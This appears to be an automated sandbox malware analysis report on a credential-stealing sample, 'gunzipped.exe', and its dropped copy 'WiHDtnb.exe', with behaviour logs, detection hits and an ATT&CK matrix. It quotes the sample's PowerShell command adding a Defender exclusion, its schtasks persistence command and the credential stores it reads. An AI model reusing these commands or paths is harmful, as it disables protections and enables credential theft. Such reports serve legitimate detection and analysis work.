                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 4570000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 5E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 6E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 6FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: 7FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 4C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 6470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 60F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 7470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory allocated: 8470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7160Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2568Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exe TID: 6504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696Thread sleep time: -360000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe TID: 4320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\gunzipped.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, WiHDtnb.exe, 0000000C.00000002.2001497626.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]12_2_0040317B
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_00402B7C GetProcessHeap,HeapAlloc,12_2_00402B7C
                Source: C:\Users\user\Desktop\gunzipped.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Users\user\Desktop\gunzipped.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeMemory written: C:\Users\user\AppData\Roaming\WiHDtnb.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeProcess created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Users\user\AppData\Roaming\WiHDtnb.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 4080, type: MEMORYSTR
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: PopPassword12_2_0040D069
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: SmtpPassword12_2_0040D069
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                111
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Scheduled Task/Job
                11
                Disable or Modify Tools
                2
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture111
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1427123 Sample: gunzipped.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 11 other signatures 2->47 7 gunzipped.exe 7 2->7         started        11 WiHDtnb.exe 5 2->11         started        process3 file4 35 C:\Users\user\AppData\Roaming\WiHDtnb.exe, PE32 7->35 dropped 37 C:\Users\user\AppData\Local\...\tmpC9C3.tmp, XML 7->37 dropped 49 Uses schtasks.exe or at.exe to add and modify task schedules 7->49 51 Adds a directory exclusion to Windows Defender 7->51 53 Injects a PE file into a foreign processes 7->53 13 gunzipped.exe 96 7->13         started        17 powershell.exe 23 7->17         started        19 schtasks.exe 1 7->19         started        21 gunzipped.exe 7->21         started        55 Multi AV Scanner detection for dropped file 11->55 57 Tries to steal Mail credentials (via file registry) 11->57 59 Machine Learning detection for dropped file 11->59 23 schtasks.exe 1 11->23         started        25 WiHDtnb.exe 11->25         started        signatures5 process6 dnsIp7 39 136.244.109.75, 49705, 49706, 49707 AS-CHOOPAUS United States 13->39 61 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->61 63 Tries to steal Mail credentials (via file / registry access) 13->63 65 Tries to harvest and steal ftp login credentials 13->65 67 Tries to harvest and steal browser information (history, passwords, etc) 13->67 69 Loading BitLocker PowerShell Module 17->69 27 WmiPrvSE.exe 17->27         started        29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 23->33         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                gunzipped.exe18%ReversingLabs
                gunzipped.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\WiHDtnb.exe100%Joe Sandbox ML
